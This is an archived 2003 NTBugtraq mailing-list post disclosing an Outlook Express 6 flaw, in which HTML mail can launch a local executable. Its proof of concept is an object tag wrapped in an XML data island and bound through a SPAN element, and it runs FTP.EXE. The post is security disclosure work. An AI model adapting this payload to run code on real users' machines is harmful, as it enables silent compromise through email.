O UT LO OK E XPRE SS 6 .00 : broken
From: http-equiv@excite.com
Date: 02/22/03
- Previous message: Thomas Kristensen: "Re: Article: Windows XP Wide Open Using Windows 2000 CD-ROM"
- Next in thread: Thor Larholm: "Re: O UT LO OK E XPRE SS 6 .00 : broken"
- Reply: Thor Larholm: "Re: O UT LO OK E XPRE SS 6 .00 : broken"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 22 Feb 2003 15:36:39 -0000 From: "http-equiv@excite.com" <http-equiv@MALWARE.COM> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Saturday, February 22, 2003
Technical silent delivery and installation of an executable no client
input other than reading an email or viewing a newsgroup message.
Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever.
This should not be possible.
When viewing an email message or a newsgroup message, Outlook Express
creates a temp file in the Internet Explorer cache. From here
security should be governed by Internet Explorer's security settings.
In an html email with internet zone applied, this will not function:
<o bject classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1"
code base="C:\WINDOWS\FTP.EXE"></object>
[screen shot: http://www.malware.com/tsktsk.png 11KB]
In an html email message or newsgroup message with internet zone
applied this will function:
<xml id=oExec> <security><exploit> <![CDATA[ <o bject id="oFile"
classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1"
code base="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>
courtesy of: http://sec.greymagic.com/adv/gm001-ie/
[screen shot: http://www.malware.com/tsktsktsk.png 11KB]
NOTE: that default installations of Outlook Express 6.00 are with
restricted zone applied. However there still remain many 'happy
people' out there that enjoy their html mail messages and html
newsgroup messages, and coupling the above with any one of a million
other unsolved problems now and in the future with Internet Explorer
and Outlook Express, including a new
http://www.malware.com/stench.html we are back in business.
Notes: This is supposed to be patched:
http://microsoft.com/technet/security/bulletin/MS02-015.asp 28 March
2002
Keywords: experts Academic Advisory Board Think Tank security concepts
-- http://www.malware.com oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo Delivery co-sponsored by TruSecure Corporation oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo TICSA - Anniversary Special - Limited Time Become TICSA certified for just $221.25 US when you register before 3/31/03 with PROMO "TS0103" at www.2test.com. NO membership fees, certification good for 2 years. Price for international delivery just $296.25 US, with this offer. Offer cannot be combined with any other special and expires 3/31/03. Visit www.trusecure.com/ticsa for full details. oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
- Next message: Clive Flint: "Re: MSIEXEC problem with long user names"
- Previous message: Thomas Kristensen: "Re: Article: Windows XP Wide Open Using Windows 2000 CD-ROM"
- Next in thread: Thor Larholm: "Re: O UT LO OK E XPRE SS 6 .00 : broken"
- Reply: Thor Larholm: "Re: O UT LO OK E XPRE SS 6 .00 : broken"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
